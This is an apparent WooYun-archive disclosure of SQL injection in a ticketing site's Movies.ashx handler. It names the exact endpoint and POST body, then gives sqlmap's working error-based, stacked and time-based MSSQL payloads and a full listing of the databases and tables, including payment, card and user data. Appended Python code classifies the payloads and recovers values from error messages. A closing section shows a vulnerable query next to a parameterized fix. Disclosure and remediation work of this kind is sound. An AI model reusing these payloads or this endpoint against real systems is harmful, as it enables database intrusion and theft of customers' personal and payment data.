WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-10-13: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public.
2015-11-27: The vendor has chosen to ignore the vulnerability; details are now disclosed to the public.
The databases contain user information, ticketing information, order information... and a lot more that I did not look at closely.
Injection point: http://www.yingke.tv/handle/Movies.ashx (POST)
POST body: AreaID=-1&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
sqlmap identified the following injection point(s) with a total of 432 HTTP(s) requests:
---
Parameter: AreaID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=

Parameter: CityID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaID=-1&CityID=11' AND 7580=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7580=7580) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'Nrhf'='Nrhf&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: AreaID=-1&CityID=11';WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: AreaID=-1&CityID=11' WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

The database and table enumeration runs below resumed the same two injection points and the same server fingerprint from the stored sqlmap session; that repeated output is omitted here.

available databases [12]:
[*] EasyPay
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] WeiXinDataBase
[*] YingKeData
[*] YingKeDataTest
[*] YKStoredCard

Database: ReportServerTempDB [9 tables]
  ChunkData
  ChunkSegmentMapping
  ExecutionCache
  PersistedStream
  Segment
  SegmentedChunk
  SessionData
  SessionLock
  SnapshotData

Database: tempdb [18 tables]
  #1590259A
  #23DE44F1
  #24D2692A
  #27AED5D5
  #28A2FA0E
  #29971E47
  #2D67AF2B
  #2E5BD364
  #2F4FF79D
  #30441BD6
  #75235608
  #76177A41
  #770B9E7A
  #77FFC2B3
  #78F3E6EC
  #79E80B25
  #7ADC2F5E
  #7BD05397

Database: EasyPay [86 tables]
  tAgent
  tBankAccountType
  tBankBalance
  tBillType
  tBookingRecord
  tCaiXinRecords
  tCaiXinUser
  tCard
  tCardBin
  tCardInStorage
  tCardMap
  tCardPhysicsType
  tChargeRecord
  tCodeTable
  tCommisionRate
  tContact
  tDailyActionStatistics
  tDailyAgentStatistics
  tDailyBalance
  tDailyDingDanStatistics
  tDailyIssueAndMerchantStatistics
  tDailyMerchantPhysicsStatistics
  tDailyMerchantStatistics
  tDailyMerchantTerminalStatistics
  tDailyPhysicsStatistics
  tDailyPriceTable
  tDailyStatistics
  tDeposit
  tDiscountType
  tEnterprise
  tEnterpriseStatistics
  tField
  tFieldBookRecord
  tFieldDiscountRule
  tFieldGroup
  tFieldScoreRule
  tFieldType
  tFinalHisTradeRecords
  tFunction
  tFunctionType
  tGoods
  tGoodsDiscountRule
  tGoodsSaleRecord
  tGoodsScoreRule
  tGoodsType
  tHisCard
  tHisLog
  tHisSaleCardRecord
  tHisTradeRecords
  tIssueMoney
  tItemClass
  tLog
  tLogLevel
  tLogType
  tMakeCardApplication
  tMember
  tMemberAuthority
  tMemberLevel
  tOffJobCalc
  tOldCard
  tOperator
  tOrgan
  tOrganCardBin
  tOrganType
  tPosAuthority
  tPosConsumptionRecord
  tPosSerial
  tPriceTable
  tPurchaseGoodsRecord
  tPurview
  tRechargeScoreRule
  tRole
  tSaleCardRecord
  tScoreType
  tStadium
  tStatusCode
  tTakeCardAuth
  tTerminal
  tTicket
  tTicketAction
  tTicketDingDan
  tTicketProject
  tTicketTradeRecords
  tTongJi
  tTradeRecords
  ttestcard

Database: ReportServer [31 tables]
  ActiveSubscriptions
  Batch
  CachePolicy
  Catalog
  ChunkData
  ChunkSegmentMapping
  ConfigurationInfo
  DataSource
  Event
  ExecutionLogStorage
  History
  Keys
  ModelDrill
  ModelItemPolicy
  ModelPerspective
  Notifications
  Policies
  PolicyUserRole
  ReportSchedule
  Roles
  RunningJobs
  Schedule
  SecData
  Segment
  SegmentedChunk
  ServerParametersInstance
  SnapshotData
  Subscriptions
  SubscriptionsBeingDeleted
  UpgradeInfo
  Users

Database: YingKeData [68 tables]
  JD_Order
  JD_OrderTicket
  LSB
  M_Advertisement
  M_BindCard
  M_BlackIP
  M_CancelTicket
  M_CardAddvalue
  M_CardMerge
  M_City
  M_CityArea
  M_DisTicket
  M_FocusImg
  M_Help
  M_Links
  M_Message
  M_Movies
  M_NewOrder
  M_News
  M_Order
  M_OrderCardInfo
  M_Place
  M_Prize
  M_PrizeOrder
  M_PrizeShop
  M_Product
  M_ProductType
  M_ProductTypePlace
  M_ServiceQQ
  M_Trade
  M_TradeAddvalue
  M_TradeArea
  M_TradeCompany
  M_TradeCompanyCardOrder
  M_TradeCompanyTicketCode
  M_TradeCompanyTicketOrder
  M_TradeTicket
  M_Trade_bak
  M_User
  M_UserAddress
  M_UserOrderAddress
  M_WhiteIP
  SM_Dept
  SM_Log
  SM_MenuTree
  SM_Role
  SM_RoleMenu
  SM_Sequences
  SM_User
  SM_UserRole
  SM_VisitUser
  S_Category
  S_CategorySub
  S_GroupBuy
  S_GroupBuyOrder
  S_ShopOrder
  S_ShopProduct
  V_GroupBuyOrder
  V_PrizeOrder
  V_ProductPlace
  V_ProductTypePlace
  V_ShopOrder
  V_TicketPlace
  V_TradeAddvalue
  V_TradeCompanyCardOrder
  V_TradeCompanyTicketInfo
  V_TradeCompanyTicketOrder
  V_TradeTicket

Database: msdb [102 tables]
  MSdbms
  MSdbms_datatype
  MSdbms_datatype_mapping
  MSdbms_map
  backupfile
  backupfilegroup
  backupmediafamily
  backupmediaset
  backupset
  log_shipping_monitor_alert
  log_shipping_monitor_error_detail
  log_shipping_monitor_history_detail
  log_shipping_monitor_primary
  log_shipping_monitor_secondary
  log_shipping_primaries
  log_shipping_primary_databases
  log_shipping_primary_secondaries
  log_shipping_secondaries
  log_shipping_secondary
  log_shipping_secondary_databases
  logmarkhistory
  restorefile
  restorefilegroup
  restorehistory
  sqlagent_info
  suspect_pages
  sysalerts
  syscachedcredentials
  syscategories
  syscollector_blobs_internal
  syscollector_collection_items_internal
  syscollector_collection_sets_internal
  syscollector_collector_types_internal
  syscollector_config_store_internal
  syscollector_execution_log_internal
  syscollector_execution_stats_internal
  syscollector_tsql_query_collector
  sysdbmaintplan_databases
  sysdbmaintplan_history
  sysdbmaintplan_jobs
  sysdbmaintplans
  sysdownloadlist
  sysdtscategories
  sysdtspackagelog
  sysdtspackages
  sysdtssteplog
  sysdtstasklog
  sysjobactivity
  sysjobhistory
  sysjobs
  sysjobschedules
  sysjobservers
  sysjobsteps
  sysjobstepslogs
  sysmail_account
  sysmail_attachments
  sysmail_attachments_transfer
  sysmail_configuration
  sysmail_log
  sysmail_mailitems
  sysmail_principalprofile
  sysmail_profile
  sysmail_profileaccount
  sysmail_query_transfer
  sysmail_send_retries
  sysmail_server
  sysmail_servertype
  sysmaintplan_log
  sysmaintplan_logdetail
  sysmaintplan_subplans
  sysmanagement_shared_registered_servers_internal
  sysmanagement_shared_server_groups_internal
  sysnotifications
  sysoperators
  sysoriginatingservers
  syspolicy_conditions_internal
  syspolicy_configuration_internal
  syspolicy_execution_internal
  syspolicy_facet_events
  syspolicy_management_facets
  syspolicy_object_sets_internal
  syspolicy_policies_internal
  syspolicy_policy_categories_internal
  syspolicy_policy_category_subscriptions_internal
  syspolicy_policy_execution_history_details_internal
  syspolicy_policy_execution_history_internal
  syspolicy_system_health_state_internal
  syspolicy_target_set_levels_internal
  syspolicy_target_sets_internal
  sysproxies
  sysproxylogin
  sysproxysubsystem
  sysschedules
  syssessions
  sysssislog
  sysssispackagefolders
  sysssispackages
  syssubsystems
  systargetservergroupmembers
  systargetservergroups
  systargetservers
  systaskids

Database: YKStoredCard [87 tables]
  tAgent
  tBankAccountType
  tBankBalance
  tBillType
  tBookingRecord
  tCaiXinRecords
  tCaiXinUser
  tCard
  tCardBin
  tCardInStorage
  tCardMap
  tCardPhysicsType
  tCardStatus
  tChangeCard
  tChargeRecord
  tCodeTable
  tCommisionRate
  tContact
  tDailyActionStatistics
  tDailyAgentStatistics
  tDailyBalance
  tDailyDingDanStatistics
  tDailyIssueAndMerchantStatistics
  tDailyMerchantPhysicsStatistics
  tDailyMerchantStatistics
  tDailyMerchantTerminalStatistics
  tDailyPhysicsStatistics
  tDailyPriceTable
  tDailyStatistics
  tDeposit
  tDiscountType
  tEnterprise
  tEnterpriseStatistics
  tField
  tFieldBookRecord
  tFieldDiscountRule
  tFieldGroup
  tFieldScoreRule
  tFieldType
  tFinalHisTradeRecords
  tFunction
  tFunctionType
  tGoods
  tGoodsDiscountRule
  tGoodsSaleRecord
  tGoodsScoreRule
  tGoodsType
  tHisCard
  tHisLog
  tHisSaleCardRecord
  tHisTradeRecords
  tIssueMoney
  tLog
  tLogLevel
  tLogType
  tMakeCardApplication
  tMember
  tMemberAuthority
  tMemberLevel
  tOffJobCalc
  tOldCard
  tOperator
  tOrgan
  tOrganCardBin
  tOrganType
  tPosAuthority
  tPosConsumptionRecord
  tPosSerial
  tPriceTable
  tPurchaseGoodsRecord
  tPurview
  tRechargeScoreRule
  tRole
  tSaleCardRecord
  tScoreType
  tStadium
  tStatusCode
  tTakeCardAuth
  tTerminal
  tTicket
  tTicketAction
  tTicketDingDan
  tTicketProject
  tTicketTradeRecords
  tTongJi
  tTradeRecords
  ttestcard

Database: WeiXinDataBase [28 tables]
  tAgent
  tAgentFunc
  tAgentFuncRelation
  tAgentLog
  tAgentOrder
  tAgentOrderTicket
  tAgentProduct
  tCardPool
  tCardTemp
  tChat
  tCinema
  tCinemaProduct
  tCinemaType
  tCity
  tCityArea
  tCustomMsg
  tFunction
  tJianYi
  tLog
  tMenu
  tMsg
  tOrderIDCreate
  tProduct
  tProductCount
  tSeesion
  tUser
  tUserOrder
  tUserOrderTicket

Database: master [6 tables]
  MSreplication_options
  spt_fallback_db
  spt_fallback_dev
  spt_fallback_usg
  spt_monitor
  spt_values

Database: Test [16 tables]
  OnlineSeatOrder
  PayInfo
  SendTicketMsg
  tRelateCinema
  tRelateFilm
  tThirdCinema
  tThirdCinemaNotify
  tThirdCity
  tThirdFilm
  tThirdFilmNotify
  tThirdHall
  tThirdMerchant
  tThirdPriceRule
  tThirdRegion
  tThirdSeat
  tThirdShow

Database: YingKeDataTest [51 tables]
  JD_Order
  JD_OrderTicket
  M_Advertisement
  M_BindCard
  M_CancelTicket
  M_CardAddvalue
  M_City
  M_CityArea
  M_DisTicket
  M_FocusImg
  M_Help
  M_Links
  M_Message
  M_Movies
  M_NewOrder
  M_News
  M_Order
  M_OrderCardInfo
  M_Place
  M_Prize
  M_PrizeOrder
  M_PrizeShop
  M_Product
  M_ProductType
  M_ProductTypePlace
  M_Trade
  M_TradeAddvalue
  M_TradeArea
  M_TradeCompany
  M_TradeCompanyCardOrder
  M_TradeCompanyTicketCode
  M_TradeCompanyTicketOrder
  M_TradeTicket
  M_User
  M_UserAddress
  M_UserOrderAddress
  SM_Dept
  SM_Log
  SM_MenuTree
  SM_Role
  SM_RoleMenu
  SM_Sequences
  SM_User
  SM_UserRole
  SM_VisitUser
  S_Category
  S_CategorySub
  S_GroupBuy
  S_GroupBuyOrder
  S_ShopOrder
  S_ShopProduct
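Added example (not part of the report, and not sqlmap's own code): a small classifier that takes the POST bodies sqlmap printed above, already URL-decoded, and labels each parameter as error-based, stacked or time-based. For the error-based family it decodes the CHAR() arithmetic to recover the qvjbq / qbvbq delimiters sqlmap wraps the extracted value in, and then performs the read-back step against a constructed SQL Server conversion error. The regexes and the error string are assumptions for illustration; the bodies themselves are the report's own payloads.

```python
import re

# The three AreaID bodies are the payloads printed above, URL-decoded.
# A raw IIS log line or proxy capture would need urllib.parse.unquote first
# (not unquote_plus, which would turn the '+' in CHAR(113)+CHAR(118) into spaces).
SAMPLE_BODIES = {
    "benign": "AreaID=-1&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=",
    "error_based": ("AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)"
                    "+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE "
                    "CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND "
                    "'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values="),
    "stacked": "AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=",
    "time_based": "AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=",
}

# Constructed SQL Server error text of the kind the error-based payload provokes:
# 2786=2786 is true, so the CASE yields CHAR(49) ('1'), the server is asked to
# CONVERT 'qvjbq1qbvbq' to INT, fails, and echoes the string back in the error.
SAMPLE_ERROR = ("Conversion failed when converting the varchar value 'qvjbq1qbvbq' "
                "to data type int.")

CHAR_CONCAT = re.compile(r"(?:CHAR\(\d+\)\+?)+", re.I)
ERROR_BASED = re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I)
WAITFOR = re.compile(r"(;)?\s*WAITFOR\s+DELAY\s+'([\d:]+)'", re.I)


def decode_char_concat(expr):
    """CHAR(113)+CHAR(118)+... -> the string it concatenates to ('qv...')."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr, re.I))


def split_form_body(body):
    """Split on '&' and the first '=' only, so '=' and '+' inside a payload
    survive (urllib.parse.parse_qs would decode the '+' we want to inspect)."""
    pairs = []
    for field in body.split("&"):
        name, _, value = field.partition("=")
        pairs.append((name, value))
    return pairs


def classify_payload(body):
    """One finding per parameter that carries one of the MSSQL payload families."""
    findings = []
    for name, value in split_form_body(body):
        if ERROR_BASED.search(value):
            markers = [decode_char_concat(m) for m in CHAR_CONCAT.findall(value)]
            findings.append({"param": name, "type": "error-based",
                             # first and last CHAR() runs are the delimiters the
                             # extracted value is wrapped in inside the error text
                             "markers": (markers[0], markers[-1])})
            continue
        m = WAITFOR.search(value)
        if m:
            # a ';' before WAITFOR means a second statement was appended
            # (stacked queries); without it the delay rides inside the WHERE
            findings.append({"param": name,
                             "type": "stacked queries" if m.group(1) else "time-based blind",
                             "delay": m.group(2)})
    return findings


def extract_between_markers(error_text, prefix, suffix):
    """The read-back half of error-based injection: cut the value out of the
    DBMS error message using the delimiters the payload planted."""
    start = error_text.find(prefix)
    if start < 0:
        return None
    start += len(prefix)
    end = error_text.find(suffix, start)
    return error_text[start:end] if end >= 0 else None


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, classify_payload(body))
    prefix, suffix = classify_payload(SAMPLE_BODIES["error_based"])[0]["markers"]
    print("value read back from the error:", extract_between_markers(SAMPLE_ERROR, prefix, suffix))
```

The decoded markers explain why the CONVERT payload works at all: the server never returns the row, it returns an error message that happens to contain the string it could not convert, and the prefix and suffix make that string easy to find in an otherwise noisy response. The same regexes, with unquoting added, are enough to flag this tooling in IIS request logs or a WAF feed.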
Fix: filter the input. Concretely, treat AreaID and CityID as integers, reject anything else, and pass them to SQL Server as bound parameters (SqlParameter in ASP.NET) instead of concatenating them into the query text.
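Added example, not code from the report or from yingke.tv: the vulnerable and the hardened query construction side by side. Python's sqlite3 stands in for SQL Server 2008 so it runs offline; the table name M_Movies is taken from the enumerated schema, while its columns and rows are constructed. The single-quoted string context is what sqlmap's payloads (a closing quote followed by AND 'jQEr'='jQEr) indicate, but the handler's real query is an assumption. The boolean payload keeps the report's quote-and-tail style; the CONVERT and WAITFOR payloads are T-SQL only and would not run on sqlite.

```python
import sqlite3

# Constructed rows standing in for YingKeData.M_Movies (columns assumed).
SAMPLE_ROWS = [
    (1, "Movie A", 11, 1),
    (2, "Movie B", 11, 2),
    (3, "Movie C", 12, 3),
]

# Boolean tail in the style of the report's "-1' ... AND 'jQEr'='jQEr" payloads.
PAYLOAD = "-1' OR 'jQEr'='jQEr"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE M_Movies (ID INTEGER, Name TEXT, CityID INTEGER, AreaID INTEGER)")
    conn.executemany("INSERT INTO M_Movies VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def build_query_vulnerable(city_id, area_id):
    """String concatenation: whatever arrives in the POST body becomes SQL text."""
    return ("SELECT ID, Name FROM M_Movies WHERE CityID='" + city_id
            + "' AND AreaID='" + area_id + "'")


def query_vulnerable(conn, city_id, area_id):
    # The quote in PAYLOAD closes the AreaID literal and the OR that follows
    # is true for every row, so the filter is bypassed entirely.
    return conn.execute(build_query_vulnerable(city_id, area_id)).fetchall()


def query_parameterized(conn, city_id, area_id):
    """Bound parameters: values travel separately from the query text, so the
    quote and OR in PAYLOAD are compared as one literal AreaID value (no match)."""
    sql = "SELECT ID, Name FROM M_Movies WHERE CityID=? AND AreaID=?"
    return conn.execute(sql, (city_id, area_id)).fetchall()


def query_safe(conn, city_id, area_id):
    """Parameters plus type validation: the IDs are integers, so anything else
    is rejected at the boundary and never reaches the DBMS at all."""
    try:
        city, area = int(city_id), int(area_id)
    except ValueError:
        raise ValueError("CityID and AreaID must be integers") from None
    sql = "SELECT ID, Name FROM M_Movies WHERE CityID=? AND AreaID=?"
    return conn.execute(sql, (city, area)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, normal input :", query_vulnerable(conn, "11", "1"))
    print("vulnerable, payload      :", query_vulnerable(conn, "11", PAYLOAD))
    print("parameterized, payload   :", query_parameterized(conn, "11", PAYLOAD))
    try:
        query_safe(conn, "11", PAYLOAD)
    except ValueError as e:
        print("validated, payload       : rejected,", e)
```

Parameter binding alone already closes the injection; the integer check on top of it is what keeps the error-based and WAITFOR payloads from even producing a query, which also removes the verbose conversion error the exfiltration relies on. In the ASP.NET handler the equivalent is a SqlCommand with SqlParameter values of type Int.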
Vendor status: unable to reach the vendor, or the vendor actively declined.